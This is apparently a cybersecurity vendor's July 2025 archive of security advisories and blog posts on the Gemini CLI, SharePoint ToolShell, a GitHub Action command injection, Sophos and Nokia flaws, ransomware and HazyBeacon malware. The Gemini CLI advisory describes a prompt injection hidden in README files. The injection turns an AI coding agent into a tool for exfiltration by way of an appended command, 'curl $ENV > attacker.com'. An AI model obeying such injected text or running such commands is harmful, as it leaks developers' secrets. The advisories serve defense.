Month: July 2025

Security Advisory

Gemini CLI Vulnerability Enables Silent Execution of Malicious Commands on Developer Systems 

Summary 

Security Advisory :

In July 2025, a critical security vulnerability was discovered in Google’s Gemini CLI, a command-line tool used by developers to interact with Gemini AI. The flaw allowed attackers to execute hidden, malicious commands without user consent by exploiting prompt injection, poor command validation and an ambiguous trust interface. 

This issue was responsibly reported and addressed with the release of Gemini CLI version 0.1.14. The incident highlights the growing need for secure integration of AI tools in software development workflows. 

Vulnerability Details 

Security researchers identified that Gemini CLI reads project context files—such as README.md—to understand the codebase. Attackers can embed malicious commands into these files using indirect prompt injection techniques. These injected payloads are often disguised within legitimate content (e.g. license text, markdown formatting) to avoid detection. 

A core issue lies in Gemini’s handling of command approvals. Gemini CLI remembers previously approved commands (e.g. grep) to avoid prompting the user repeatedly. Attackers exploited this by appending malicious commands (e.g. curl $ENV > attacker.com) to a trusted one. Since the first part is familiar, the entire command string is executed without further validation. 

To increase stealth, malicious commands are hidden using whitespace padding or formatting tricks to avoid visual detection in the terminal or logs. Researchers demonstrated this attack by cloning a poisoned public GitHub repository, which resulted in unauthorized exfiltration of credentials during Gemini CLI analysis.Initially labeled as a low-severity issue, Google elevated its classification to a high-priority vulnerability and released a fix in version 0.1.14, which now enforces stricter visibility and re-approval of commands. 

Note: By default, Gemini CLI does not enable sandboxing, so manual configuration is required to isolate execution environments from the host system. 

Attack Flow 

Step Description 
1. Craft Malicious prompt injections are embedded inside context files like README.md along with benign code. 
2. Deliver Malicious repository is cloned or reviewed by a developer using Gemini CLI. 
3. Trigger Gemini CLI loads and interprets the context files. 
4. Execution Malicious code is executed due to weak validation and implicit trust. 
5. Exfiltrate Environment variables or secrets are silently sent to attacker-controlled servers. 

Proof-of-Concept Snippet 

Source: Tracebit 

Why It’s Effective 

  • Indirect Prompt Injection: Inserts malicious instructions within legitimate files rather than in direct input, bypassing typical user scrutiny. 
  • Command Whitelist Bypass: Weak command validation allows malicious extensions of approved commands. 
  • Visual Stealth: Large whitespace and terminal output manipulation hide malicious commands from users & security Tools. 

Broader Implications 

Gemini CLI are powerful for developers, helping to automate tasks and understand code faster. But this also comes with vulnerabilities especially when these tools can run commands and interact with untrusted code. This recent example shows how important it is to stay secure when using AI assistants to analyze unknown repositories. For teams working with open-source projects or unfamiliar codebases, it’s important to have safety checks in place. This highlights the growing need for smarter, more secure AI-driven tools that support developers without putting systems at risk. 

Remediation

  • Upgrade Gemini CLI to version 0.1.14 or later. 
  • Enable sandboxing modes where it is possible to isolate and protect systems. 
  • Avoid running Gemini CLI against untrusted or unknown codebases without appropriate safeguards. 
  • Review and monitor command execution prompts carefully 

Conclusion: 
The Gemini CLI vulnerability underscores how prompt injection and command trust mechanisms can silently expose systems to attack when using AI tools. As these assistants become more deeply integrated into development workflows, it’s vital to adopt a “trust, but verify” approach treating AI-generated or assisted actions with the same caution as externally sourced code. 

Security, visibility and isolation should be core pillars in any team’s approach to adopting AI in DevOps and engineering pipelines. 

References

Blogs Security Advisory

Kaspersky reveals SharePoint ToolShell vulnerabilities stem from incomplete 2020 fix.

Kaspersky’s Global Research and Analysis Team (GReAT) discovered that the recently exploited ToolShell vulnerabilities in Microsoft SharePoint originate from an incomplete fix for CVE-2020-1147, first reported in 2020.

IntruceptLabs have published the security advisory https://intruceptlabs.com/2025/07/toolshell-zero-day-exploits-in-microsoft-sharepoint-enable-full-remote-takeover/ on 21st July 2025.

The SharePoint vulnerabilities have emerged as a major cybersecurity threat this year amid active exploitation. Kaspersky Security Network showed exploitation attempts worldwide, including in Egypt, Jordan, Russia, Vietnam and Zambia.

The attacks target organizations across government, finance, manufacturing, forestry and agriculture sectors. 

Two newly discovered zero-day vulnerabilities (CVE-2025-53770 and CVE-2025-53771) in Microsoft SharePoint Server are being actively exploited in the wild.

There is currently no patch available to plug this security hole, but Microsoft says that customers running on-premises SharePoint Servers can stop attackers from exploiting the vulnerability by configuring Antimalware Scan Interface (AMSI) integration in SharePoint and deploying Defender AV on all SharePoint servers.

Share point Vulnerabilities a major cyber threat

The SharePoint vulnerabilities have emerged as a major cybersecurity threat this year amid
active exploitation. Kaspersky Security Network showed exploitation attempts worldwide,
including in Egypt, Jordan, Russia, Vietnam and Zambia.

The attacks target organizations across government, finance, manufacturing, forestry and agriculture sectors. Kaspersky solutions proactively detected and blocked ToolShell attacks before the vulnerabilities were publicly disclosed.

Kaspersky GReAT researchers analyzed the published ToolShell exploit and found it alarmingly similar to the 2020 CVE-2020-1147 exploit.

This suggests that the CVE-2025- 53770 patch is, in fact, an effective fix for the vulnerability that CVE-2020-1147 attempted to address five years ago.
The connection to CVE-2020-1147 became evident following the discovery of CVE-2025- 49704 and CVE-2025-49706, patched on July 8. However, these fixes could be bypassed by adding a single forward slash to the exploit payload.

Once Microsoft learned of active exploitation of these vulnerabilities, they responded with comprehensive patches that addressed potential bypass methods, designating the vulnerabilities as CVE-2025-53770 and CVE-2025-53771.

The surge in attacks against SharePoint servers worldwide occurred during the window between initial exploitation and full patch deployment. Despite patches now being available for the ToolShell vulnerabilities, Kaspersky expects attackers will continue exploiting this chain for years to come.

“Many high-profile vulnerabilities remain actively exploited years after discovery —
ProxyLogon, PrintNightmare and EternalBlue still compromise unpatched systems today.

We expect ToolShell to follow the same pattern: its ease of exploitation means the public exploit
will soon appear in popular penetration testing tools, ensuring prolonged use by attackers,”
said Boris Larin, principal security researcher at Kaspersky GReAT.

Do connect with us for any queries https://intruceptlabs.com/contact/

(Source: Read full report on Read the full report on Securelist.com)

Security Advisory

Critical Vulnerability identified in tj-actions/branch-names’ GitHub Action workflow

Security advisory:  Patch Now! Critical Command Injection in GitHub Action tj-actions/branch-names Affects 5,000+ public repositories. 

Summary:

A critical vulnerability has been identified in the tj-actions/branch-names’ GitHub Action workflow which allows arbitrary command execution in downstream workflows. This issue arises due to inconsistent input sanitization and unescaped output, enabling malicious actors to exploit specially crafted branch names or tags.

Severity Critical 
CVSS Score 9.1 
CVEs CVE-2025-54416 
POC Available Yes 
Actively Exploited No 
Exploited in Wild No
Advisory Version 1.0 

Overview 
This issue arises due to inconsistent input sanitization and unescaped output, enabling malicious actors to exploit specially crafted branch names or tags. While internal sanitization mechanisms have been implemented, the action outputs remain vulnerable, exposing consuming workflows to significant security risks. This is fixed in version 9.0.0

The flaw allows attackers to run any command during GitHub Actions workflows by creating specially crafted branch names or tags.  

Vulnerability Name CVE ID Product Affected Severity Fixed Version 
Command Injection in branch-names GitHub Action  CVE-2025-54416   tj-actions/branch-names GitHub Action <v8.2.1 9.1  v9.0.0 or later 

Technical Summary 

This Vulnerability puts many CI/CD pipelines at serious risk, including the possibility of stealing secrets or injecting malicious code into releases.

The vulnerability exists due to unsafe usage of the eval command in the action’s script. Although some escaping was done using printf “%q”, developers later used eval printf “%s” to unescaped values, which reintroduced command injection risks.

Any branch name containing malicious shell code can trigger execution during workflows. 

The vulnerability affects GitHub Action workflows that use tj-actions/branch-names. It allows attackers to inject and execute arbitrary shell commands by creating a branch with malicious content. The issue is caused by the unsafe use of eval when handling branch names and tags in output generation. 

CVE ID System Affected  Vulnerability Details Impact 
CVE-2025-54416 GitHub repositories using tj-actions/branch-names < v8.2.1 Unsafe use of eval leads to command injection Attacker can run arbitrary commands, steal secrets, alter source code, or compromise workflows 

Proof of Concept (POC) 


 
Remediation

  • Update immediately to tj-actions/branch-names version v9.0.0 or higher
  • The vulnerable eval code has been replaced with safe printf usage. 
  • Review your workflows to ensure no malicious activity has occurred. 
  • Check logs for strange branch names or unexpected shell activity. 

Conclusion: 
This command injection flaw is extremely dangerous due to its simplicity and the number of projects it affects. GitHub Actions workflows that use branch names or tags from pull requests are especially at risk. Attackers don’t need access to the code just the ability to open a pull request.

All developers and security teams should act now by updating to the latest version and reviewing usage of GitHub Actions in their workflows. 

References

Blogs

Surge in Ransomware attack reveal sophistication of Threat actors that strategically focuses on industries to incentivizes Ransom payment

  • The United States remains the primary target for Ransomware attacks
  • UK is preparing to ban any Ransomware payments  for critical infrastructure companies
  • Manufacturing, Technology and Healthcare top targeted sectors, with the Oil & Gas industry experiencing a remarkable 935% increase in attacks as per Zscaler report
  • RaaS market growth drivers

There has been improvement in cyber resilience but it has been observed when too many entities pay ransom, each payment provides gateway for next attack as the payment incentivise.

Ransomware attack target pattern reveals how threat actors are strategically focusing on industries where operational disruption, data sensitivity, and regulatory concerns create maximum leverage.

In the beginning of July 2025, Federal authorities, including the FBI and the U.S. Cybersecurity and Infrastructure Security Agency (CISA), have issued a high-priority advisory warning about the escalating threat posed by the Medusa ransomware group.

Medusa ransomware group ramped up its attacks, increasingly targeting users of major email service providers like Gmail and Outlook. Medusa’s reach extends across multiple industries, with healthcare, education, legal services, insurance, technology, and manufacturing among the hardest hit.

Now UK is preparing to ban any Ransomware payments  for critical infrastructure companies, local governments, schools and publicly funded entities like the NHS. The new ransomware payment proposal is just one part of a package of new regulations slated to soon go into effect in the UK, mostly centered on the Cyber Resilience Bill.

The new UK rules would additionally require all business types that are not impacted to notify the government when they intend to make a ransomware payment and may be required to seek guidance on the possibility of the payment violating sanctions on cybercriminal groups.

Surge in ransomware attacks

Zscaler  released its annual ThreatLabz 2025 Ransomware Report, revealing a dramatic 146% surge in ransomware attacks blocked by their cloud platform

The report highlights a significant shift in attack strategies, with threat actors increasingly focusing on data extortion over encryption.

Key findings show that ransomware groups stole 238 TB of data, representing a 92% increase year-over-year.

The report identifies Manufacturing, Technology, and Healthcare as the most targeted sectors, with the Oil & Gas industry experiencing a remarkable 935% increase in attacks.

The United States remains the primary target, accounting for 50% of all attacks with 3,671 incidents. RansomHub emerged as the most active group with 833 publicly named victims, followed by Akira (520) and Clop (488).

Ransomware and Crypto market

Well ransomware technique might have changed its pattern but not tactics, with crytpcurrencies it marked a major change and turning point in the world of cyber security.

How can we forget WannaCry (2017), it was perhaps the most infamous ransomware attack in history, caused global disruption by exploiting a Windows vulnerability.

The demand was Bitcoin, but its scale and method were more advanced but not the first.

BlackSuit ransomware extortion sites seized in Operation Checkmate

Law enforcement has seized the dark web extortion sites of the BlackSuit ransomware operation, which has targeted and breached the networks of hundreds of organizations worldwide over the past several years.

Yesterday 28 july,  the websites on the BlackSuit .onion domains were replaced with seizure banners announcing that the ransomware gang’s sites were taken down by the U.S. Homeland Security Investigations federal law enforcement agency as part of a joint international action codenamed Operation Checkmate.

Key trends Key driving the Ransomware Protection Market


The demand for ransomware protection solutions is further fuelled by the growing number of cyber-attacks targeting businesses, particularly in the BFSI sector, which remains the largest revenue generator in the market.

The demand for RaaS based products growing due to corporate digitization, and the advent of crypto currency like Bitcoin are the key market drivers enhancing the market demand and growth.

This  include technological advancements and increasing cyber threats.

  • Market size in 2024: USD 32.24 billion; projected to reach USD 93.35 billion by 2032.
  • End-point security segment accounted for 35% of market revenue.
  • BFSI sector generated the most income, with significant ransomware attacks reported.
  • Managed services segment dominated the market, catering to SMEs for enhanced cyber security.

Of all the reasons, cyber attacks now focus on any vulnerability as many businesses are switching to cloud services. In response to the ransom, distributed denial-of-service (DDoS) attacks are launched, which continue until the ransom is paid or the data risks being permanently lost.

Cybercriminals may breach into sites for trading cryptocurrencies and steal money. Crypto currency is currently the most widely used payment method in the event of a ransomware attack

Email remained the primary entry point in 96% of the reviewed breaches, accounting for 93%.

Social attacks are roughly three times more likely to cause breaches in businesses than physical vulnerabilities, highlighting the importance of regular staff cybersecurity training.

It has caused business to start researching ransomware defenses and has significantly increased demand for these defenses in the market under investigation.

Around the world, there are more data leaks and other security breaches. Phishing attacks have been used against numerous businesses from various industries at some point.

APEC market for Ransomware expected to grow

The Asia-Pacific Ransomware Protection Market is expected to grow at the fastest CAGR from 2023 to 2032.

This is due to the growing economies of China, India, and Australia spending extensively on cyber security solutions; Asia Pacific is also predicted to have growth potential in the ransomware prevention market.

Moreover, China’s Ransomware Protection market held the largest market share, and The Asia-Pacific region’s fastest-growing market for ransomware protection was India.

The market for Ransomware Protection industry has recently provided some of the most important benefits. Major players in the Ransomware Protection market, are attempting to increase market demand by investing in research and development operations.

Ransomware Protection Industry Developments

Intrucept has launched Intru360 gives security analysts and SOC managers a clear view across the organization, helping them fully understand the extent and context of an attack. It also simplifies workflows by automatically handling alerts, allowing for faster detection of both known and unknown threats.

Identify latest threats without having to purchase, implement, and oversee several solutions or find, hire, and manage a team security analyst.

Unify latest threat intelligence and security technologies to prioritize the threats that pose the greatest risk to your company.

Here are some features we offer:

  • Over 400 third-party and cloud integrations.
  • More than 1,100 preconfigured correlation rules.
  • Ready-to-use threat analytics, threat intelligence service feeds, and prioritization based on risk.
  • Prebuilt playbooks and automated response capabilities.

Source:

 BlackSuit ransomware extortion sites seized in Operation Checkmate

Ransomware attacks surge despite international enforcement effort | Cybersecurity Dive

Ransomware Protection Market Size, Growth Analysis – 2032

Blogs

Malware Uses AWS Lambda to collect data; Govt Org’s Across S E Asia affected by HazyBeacon

Data Stolen from various government based organizations across South east-Asia via State-Backed HazyBeacon Malware that Uses AWS Lambda was discovered and tracked by researchers Palo Alto Networks Unit 42 under the moniker CL-STA-1020.

Here “CL” stands for “cluster” and “STA” refers to “state-backed motivation, data collected include information about recent tariffs and trade disputes. The initial access vector used to deliver the malware is currently not known, although evidence shows the use of DLL side-loading techniques to deploy it on compromised hosts. Specifically, it involves planting a malicious version of a DLL called “mscorsvc.dll” along with the legitimate Windows executable, “mscorsvw.exe.”

Campaign execution flow

As per researchers backdoor leverages AWS Lambda URLs as command and control (C2) infrastructure. AWS Lambda URLs are a feature of AWS Lambda that allows users to invoke serverless functions directly over HTTPS.

This technique uses legitimate cloud functionality to hide in plain sight, creating a reliable, scalable and difficult-to-detect communication channel.

Figure 1 shows the high-level execution flow of this attack.

(Source: Behind the Clouds: Attackers Targeting Governments in Southeast Asia Implement Novel Covert C2 Communication)

Key points:

The malware is using a newly discovered Windows backdoor dubbed HazyBeacon.

Secondly, it exploits a legitimate feature of the AWS Lambda serverless compute service called Lambda URLs, to hide its malicious activities

AWS Lambda URLs are a part of AWS Lambda that allow users to invoke serverless functions directly over HTTPS.

In this attack, the HazyBeacon backdoor uses the service to establish C2 communications, allowing the actor to engage in covert intelligence gathering.

Researchers at Trellix, revealed the attacker tactic of using Lambda to obscure C2 activity in late June, noting that such obscurity “makes network-based detection nearly impossible without decryption or deep behavioral analysis,” according to their report.

During backdoor deployment, attackers also establish persistence on the compromised Windows endpoint by creating a Windows service named msdnetsvc, which ensures that the HazyBeacon DLL would be loaded even after rebooting the system.

Unit 42 included a list of indicators of compromise (IoCs) in the post to help identify a potential attack. Defenders can set their machine-learning models and analysis techniques to be triggered by those IoCs, as well as use behavioral threat protection to detect and block the execution of processes with malicious behavior in their cloud environments.

How the malware reaches out to serverless AWS Lambda endpoints

  • These URLs are hosted on cloud infrastructure that’s globally trusted
  • Traffic looks like regular HTTPS communication
  • Detection becomes near-impossible for traditional firewalls or EDRs

This use of cloud-native tools for C2 is a growing trend in advanced persistent threats (APTs).

South east Asia a focal point of target

The reason why Southeast Asia has increasingly becoming a focal point for cyber espionage mainly due various sensitive trade negotiations being done by countries, defense enhancement taken up by countries as a part of modernization and power alignment between U.S.–China.

Why threat actors chose this area via targeting government agencies as the data stolen carried various intelligence inputs that were based on foreign policy direction, infrastructure planning and various regulatory shifts that further influence the behavior of global markets.

HazyBeacon reflects a broader aspect and trend in cyber security related to advanced persistent threats using trusted platforms as covert channels.

This cloud-based malware cluster, similar techniques have been observed in threats using Google Workspace, Microsoft Teams, or Dropbox APIs to evade detection and facilitate persistent access.

Once the malware is on the system, it doesn’t want to leave. HazyBeacon registers itself as a Windows service, making sure it gets relaunched after every reboot.

Organizations who detect and mitigate this emerging threats also understand how attackers exploit cloud services for malicious purposes.

The misuse of AWS Lambda occurs when the malicious DLL, mscorsvc.dll, establishes a C2 channel through an AWS Lambda URL. AWS Lambda runs code in response to events without requiring server provisioning or management; the URLs feature, introduced in 2022, extends this functionality by providing customers with a way to configure dedicated HTTPS endpoints for Lambda functions.

Source: 🔍 Deep Dive: How State‑Backed HazyBeacon Malware is Weaponizing AWS Lambda & Steganography | by Abhay Haswani | Jul, 2025 | Medium

Security Advisory

Pre-Auth Remote Code Execution Flaws Patched in Sophos Firewall 

Summary : Sophos has resolved several critical security vulnerabilities in its Firewall products, the most severe vulnerability could allow remote code execution without authentication, potentially giving attackers full control over impacted systems.

OEM Sophos 
Severity Critical 
CVSS Score 9.8 
CVEs CVE-2025-6704, CVE-2025-7624 
POC Available No 
Actively Exploited Yes 
Exploited in Wild Yes 
Advisory Version 1.0 

Overview 

To address the issue, the Sophos has issued hotfixes for five separate vulnerabilities. Two of these are rated as critical and present a serious threat to enterprise networks around the globe. 

                Vulnerability Name CVE ID Product Affected Severity Fixed Version 
Arbitrary file writing vulnerability in Secure PDF eXchange (SPX) feature  CVE-2025-6704 Sophos Firewall Critical   SFOS 21.0 MR2 (21.0.2) and later 
SQL injection vulnerability in legacy SMTP proxy CVE-2025-7624 Sophos Firewall Critical SFOS 21.0 MR2 (21.0.2) and later 

Technical Summary 

The CVE-2025-6704 and CVE-2025-7624 are identified in Sophos Firewall versions prior to 21.0 MR2 (21.0.2), both with a CVSS v3.1 base score of 9.8, indicating critical severity.  

The CVE-2025-6704 involves an arbitrary file writing vulnerability within the Secure PDF eXchange (SPX) feature.

SPX is enabled and the firewall operates in High Availability (HA) mode, attackers can exploit this flaw to execute arbitrary code remotely without authentication. This pre-authentication remote code execution can lead to full system compromise, affecting confidentiality, integrity and availability. 

CVE-2025-7624 pertains to an SQL injection vulnerability in the legacy (transparent) SMTP proxy of Sophos Firewall. If a quarantining policy is active for email and the system was upgraded from a version older than 21.0 GA, this weakness could potentially allow remote code execution.

Exploitation of this flaw can lead to unauthorized access, manipulation of firewall configurations, and potential lateral movement within the network. 

CVE ID System Affected  Vulnerability Details Impact 
 CVE-2025-6704 v21.5 GA and older A rare SPX feature flaw in HA mode can allow pre-auth remote code execution, affecting 0.05% of devices.  Pre-auth remote code execution (RCE) in Sophos Firewall SPX feature 
CVE-2025-7624 v21.5 GA and older An SQL injection in the legacy SMTP proxy can enable remote code execution if email quarantine is active and SFOS was upgraded from pre-21.0 GA. It affects up to 0.73% of devices. Remote code execution via SMTP proxy 

In addition to the Critical Severity vulnerabilities, two other High and one medium severity issues were addressed. 

CVE-2025-7382 – Command Injection in WebAdmin Interface (CVSS 8.8) 

A WebAdmin command injection flaw allows adjacent pre-auth code execution on HA auxiliary devices if admin OTP is enabled.  

CVE-2024-13974 – Business Logic Vulnerability in Up2Date Component (CVSS 8.1) 

 A business logic flaw in Up2Date lets attackers control firewall DNS to enable remote code execution. 

CVE-2024-13973 – Post-Auth SQLi Vulnerability in WebAdmin (CVSS 6.8) 

A post-auth SQL injection in WebAdmin allows admins to execute arbitrary code. 

Remediation

Users should immediately update Sophos Firewall to the latest patched version: 

  • For CVE-2025-6704, CVE-2025-7624, CVE-2025-7382: Upgrade to Sophos Firewall 21.0 MR2 (21.0.2) or later. 
  • For CVE-2024-13974 and CVE-2024-13973: Upgrade to Sophos Firewall 21.0 MR1 (20.0.1) or later. 

If you are not using the Secure PDF eXchange (SPX) feature or legacy SMTP proxy, consider disabling them until they are patched. 

Users operating legacy versions prior to the supported range must upgrade their systems to receive these critical security protections and maintain adequate defense against potential exploitation attempts.

Conclusion: 
In Sophos Firewalls that allow attackers to execute code remotely without logging in. Although only a small percentage of devices are affected, the flaws are serious.

Fortunately, Sophos quickly pushed automatic fixes, and no attacks have been seen so far. Users should verify their firewalls are fully updated and have auto update enabled to stay protected. 

The impact scope for this vulnerability reaches up to 0.73% of deployed devices. Both critical vulnerabilities were discovered and responsibly disclosed through Sophos’ bug bounty program by external security researchers.

References

Security Advisory

Critical Remote Code Execution in Nokia WaveSuite NOC 

Summary : Security Advisory: Two command injection vulnerabilities have been found in Nokia’s WaveSuite Network Operations Center (WS-NOC), a key tool used to manage telecom and enterprise networks.

OEM Nokia 
Severity Critical 
CVSS Score 9.0 
CVEs CVE-2025-24936, CVE-2025-24938   
POC Available No 
Actively Exploited No 
Exploited in Wild No 
Advisory Version 1.0 

Overview 

These vulnerabilities allow attackers with limited access to run malicious commands on the system’s operating system. The vulnerabilities affect WS-NOC versions 23.6, 23.12, and 24.6. Nokia has released fixes in version 24.6 FP3 and newer. 

Vulnerability Name CVE ID Product Affected Severity Fixed Version 
​ Command Injection Vulnerability  CVE-2025-24936 Nokia WS-NOC  Critical  v24.6 FP3 & later 
​ Command Injection Vulnerability  CVE-2025-24938 Nokia WS-NOC  High  v24.6 FP3 & later 

Technical Summary 

The first vulnerability, CVE-2025-24936, CVSS- 9.0 due to the system doesn’t properly check parts of a web address (URL). The attacker with low privileged access can trick the system into running malicious commands, as if they were part of the system itself. As this flaw has been published, attackers can remotely target exposed or inadequately secured administrative pages. 

The second issue, with the CVE-2025-24938, CVSS- 8.4 affects to new user accounts are created through the web interface. In this case, with high privileged access – administrators can intentionally enter harmful commands because their input isn’t being filtered properly. 

CVE ID System Affected  Vulnerability Details Impact 
CVE-2025- 24936 WS-NOC 23.6, 23.12, 24.6 Unfiltered URL input enables command injection by low-privileged users. Remote code execution 
CVE-2025- 24938 WS-NOC 23.6, 23.12, 24.6 Insufficient input validation during account creation enables command injection. Privilege escalation, Remote code execution 

Remediation

  • Immediate Action: Upgrade WS-NOC to version 24.6 FP3 or latest one to mitigate both vulnerabilities. 

Recommendations: 

  • Configuration Check: Restrict admin panel and WS-NOC access to trusted, internal networks only. 
  • Environment Hardening: Regularly audit user privileges, conduct input validation reviews, and deploy security monitoring for unusual command executions originating from the WS-NOC application. 

Conclusion: 

CVE-2025-24936 and CVE-2025-24938 are critical command injection vulnerabilities in Nokia WaveSuite NOC, which is used in telecom systems around the world. These vulnerabilities allow attackers to execute malicious commands with limited access. As these systems are part of critical infrastructure, prompt patching is essential to prevent potential remote attacks and network disruption. 

References

Blogs

Increased Funding on Cyber Offensive operation against Cyber Defense budget cut by Trump Admin; How wise a decision? Lets explore

Major new legislation commits over $1billion to US cyber offensives. Defining Cyber-offensive operations will include exploiting flaws in software or hack devices or deploy spyware.

This also include collecting internet traffic data and may involve targeted cyberattacks using zero-day exploits. Organizations often build the necessary infrastructure for such activities or gathers Intelligence as a part of these activates.

Trump administration, through the Department of Defense, has announced plans to spend $1 billion over four years on “offensive cyber operations.”

Along side recently the Trump regime announced that cyber offensive operation against Russia will be paused, highlighting that US govt now focuses mainly on China, moving away from eastern Europe.

It’s not clear what tools or software would qualify, but the legislation notes that the funds would go towards enhancing and improving the capabilities of the US Indo-Pacific Command, potentially focusing on the US’s biggest geopolitical rival, China.

The ongoing trade war with China is one of the main reason for Trump regime to shift focus from Russia , and in recent months security researchers have seen Chinese state hackers linked to People’s Liberation Army and the Ministry of State Security target companies in the fields of robotics, artificial intelligence, cloud computing and high-end medical device manufacturing. 

The legislation does not provide detailed information on what “offensive cyber operations” entail or which tools and software will be funded. The investment comes at a time when the U.S. has simultaneously reduced its cybersecurity defense budget by $1 billion. Few months back we witnessed how the US Cybersecurity and Infrastructure Security Agency (CISA) reaffirmed its commitment to defending against all cyberthreats after budget cuts was announced.

Over 1,000 CISA staff have departed since early 2025 through a combination of layoffs, buyouts, and voluntary resignations. What remains is a hollowed-out workforce facing rising cyber threats with fewer tools and teammates.

CISA maintained although the continued efforts to undermine and weaken cybersecurity teams capabilities, however counter-productive that may be in protecting US infrastructure.

Senator Ron Wyden has concerns. “Vastly expanding U.S. government hacking is going to invite retaliation — not just against federal agencies, but also rural hospitals, local governments and private companies who don’t stand a chance against nation-state hackers,” Wyden told the news site.

The US administration simultaneously enacted cuts to the nation’s cybersecurity defense allocations, by slashing $1 billion from the U.S. cyber defense budget. The cuts pose a significant risk as the country faces increasing cyber threats, particularly from Chinese adversaries.

However, the move to a more offensive cyber stance has been critiqued by Democratic Senator and Senate intelligence committee member Ron Wyden, who said that the offensive strategy, combined with Trump and DOGE’s massive cuts to defensive cyber operations such as slashing the budget and the termination of staff from the US Cybersecurity and Infrastructure Security Agency (CISA), only invites retaliation from the US’ largest geopolitical rival.

“The Trump administration has slashed funding for cyber security and government technology and left our country wide open to attack by foreign hackers,” Wyden told TechCrunch.

How wise decision it is to cut cyber defense budget while increasing Cyber offensive spending?

The layoffs at CISA have led to concerns the U.S. is less well protected against cyber threats from the likes of China, Russia and Iran.

Obviously there will be reduction in capacity to defend against cyberattacks, especially large-scale coordinated campaigns. The federal government has inadvertently provided adversaries with a map of its blind spots by scaling back critical cybersecurity programs.

This increase in budget for Cyber offensive operation is seen as an aggressive push and might provoke retaliatory attacks on vulnerable targets, such as local governments and healthcare entities. According to the report, the bill does not specify what the “offensive cyber operations” are or what software would qualify for funding.

At the same time The Trump administration has halted US offensive cyber operations against Russia, sparking concerns over national security and potential Russian cyber threats.

The Trump administration is well aware of the nation state attack and advance techniques cyber adversaries adopt to, a national threat to infrastructure security that cannot be compromised.

Every year there has been increase in cyber security budget if we take a look at from 2017 to 2024. The US government civilian agencies spent more on cybersecurity in each successive year than they did the prior year.

(Source: https://techcrunch.com)

Soucrce: Trump seeks unprecedented $1.23 billion cut to federal cyber budget | CSO Online

Security Advisory

ToolShell Zero-Day Exploits in Microsoft SharePoint Enable Full Remote Takeover 

Summary : Security Advisory


Two newly discovered zero-day vulnerabilities (CVE-2025-53770 and CVE-2025-53771) in Microsoft SharePoint Server are being actively exploited in the wild.

There is currently no patch available to plug this security hole, but Microsoft says that customers running on-premises SharePoint Servers can stop attackers from exploiting the vulnerability by configuring Antimalware Scan Interface (AMSI) integration in SharePoint and deploying Defender AV on all SharePoint servers.

OEM Microsoft 
Severity Critical 
CVSS Score 9.8 
CVEs CVE-2025-53770, CVE-2025-53771 
Actively Exploited Yes 
Exploited in Wild Yes 
Advisory Version 1.0 

Overview 

These flaws allow unauthenticated remote code execution on on-premises servers, bypassing authentication and gaining full control over affected systems. Microsoft has released urgent security updates for supported SharePoint versions to address this issue. 

                   Vulnerability Name CVE ID Product Affected Severity CVSS Score 
SharePoint Server Remote Code CVE-2025-53770 SharePoint Server (on-prem) Critical 9.8 
Execution Vulnerability CVE-2025-53771 SharePoint Server (on-prem) Medium 6.3 

Technical Summary 

The vulnerabilities CVE-2025-53770 and CVE-2025-53771 stem from insecure handling of cryptographic key material and deserialization logic in on-premises Microsoft SharePoint Servers. These flaws enable a chained remote code execution attack dubbed ToolShell, where an unauthenticated attacker can gain full control of vulnerable servers. 

ToolShell is a sophisticated evolution of vulnerabilities CVE-2025-49704 and CVE-2025-49706, which were disclosed and patched in early July 2025 following demonstrations at Pwn2Own Berlin. Within days, attackers had bypassed these initial patches, forcing Microsoft to issue updated patches with new CVEs (53770, 53771). These latest variants are actively exploited in the wild. 

The exploit begins with a crafted request to the SharePoint endpoint /ToolPane.aspx, which exposes the internal configuration mechanism. By exploiting deserialization weaknesses, attackers extract cryptographic secrets, specifically the ValidationKey and DecryptionKey  which are used to sign the VIEWSTATE payloads. 

With these secrets, an attacker can generate malicious, signed payloads that are trusted by SharePoint’s security model, allowing arbitrary code execution without any authentication. This effectively turns SharePoint’s trust mechanism into a delivery vector for persistent compromise. 

CVE ID System Affected  Vulnerability Details Impact 
CVE-2025-53770 SharePoint 2016, 2019 Exploits deserialization in /ToolPane.aspx to steal crypto keys and craft signed __VIEWSTATE payloads Remote Code Execution, full system compromise 
CVE-2025-53771 SharePoint 2016, 2019 Variant of CVE-2025-49706; bypasses earlier fixes using enhanced payload injection techniques Persistent access without credentials 

Remediation: To mitigate potential attacks customers should follow:

Organizations running on-premises Microsoft SharePoint Servers must take the following steps immediately: 

  1. Apply Security Updates: 
  • SharePoint Subscription Edition: KB5002768 
  1. Enable AMSI Protection: 
  • Enable Antimalware Scan Interface (AMSI) in Full Mode for SharePoint. 
  • AMSI was turned on by default in Sept 2023 updates for 2016/2019. 
  1. Rotate Cryptographic Keys: 
  • Use Update-SPMachineKey (PowerShell) or Central Admin. 
  • Restart IIS using iisreset.exe after key rotation. 
  1. Deploy Endpoint Protection: 
  • Use Microsoft Defender for Endpoint or equivalent XDR tools. 

CISA Alert and Advisory Inclusion: 

The Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2025-53770 to its Known Exploited Vulnerabilities (KEV) catalog. Federal agencies and private-sector partners are required to apply mitigations immediately due to confirmed active exploitation. CISA emphasized that such vulnerabilities pose an unacceptable risk to federal systems and critical infrastructure. 

Indicators of Compromise (IOCs): 

Type Value (Obfuscated/Generalized) Description 
IP Address 107.191.58[.]76, 104.238.159[.]149 Observed in initial and second attack waves 
User-Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0 User-Agent string seen in exploitation requests 
URL Path POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx Exploit entry point targeting ToolPane 

Conclusion: 
The ToolShell exploit chain represents a critical security threat to organizations using on-premises SharePoint Servers.

The vulnerabilities are not theoretical, attackers are actively exploiting them to gain full control of systems, exfiltrate cryptographic secrets and establish long-term persistence. With official patches now available, immediate action is required to prevent compromise, contain exposure and ensure ongoing system integrity. 

References

Blogs

Zero Trust 2.0” Strategy by White House to Streamline Compliance; A Shift in Threat landscape

Zero trust isn’t just for security teams, but a strategy where organizations meet compliance standards, vendors behavior, govt policies. Overall zero trust is a shift in how an entire enterprise thinks how to access risk and more than a checklist.

The White House is developing a “Zero Trust 2.0” strategy to focus on targeted, high-impact cybersecurity initiatives and improve the efficiency of federal cyber investments.

Trump admin Officials aim to streamline compliance regimes and tailor software security requirements, especially differentiating critical from low-risk software.

The administration is also preparing new guidance on drone procurement and use, restricting purchases from certain foreign entities, and finalizing instructions for agencies to adopt post-quantum cryptography following recent NIST standards.

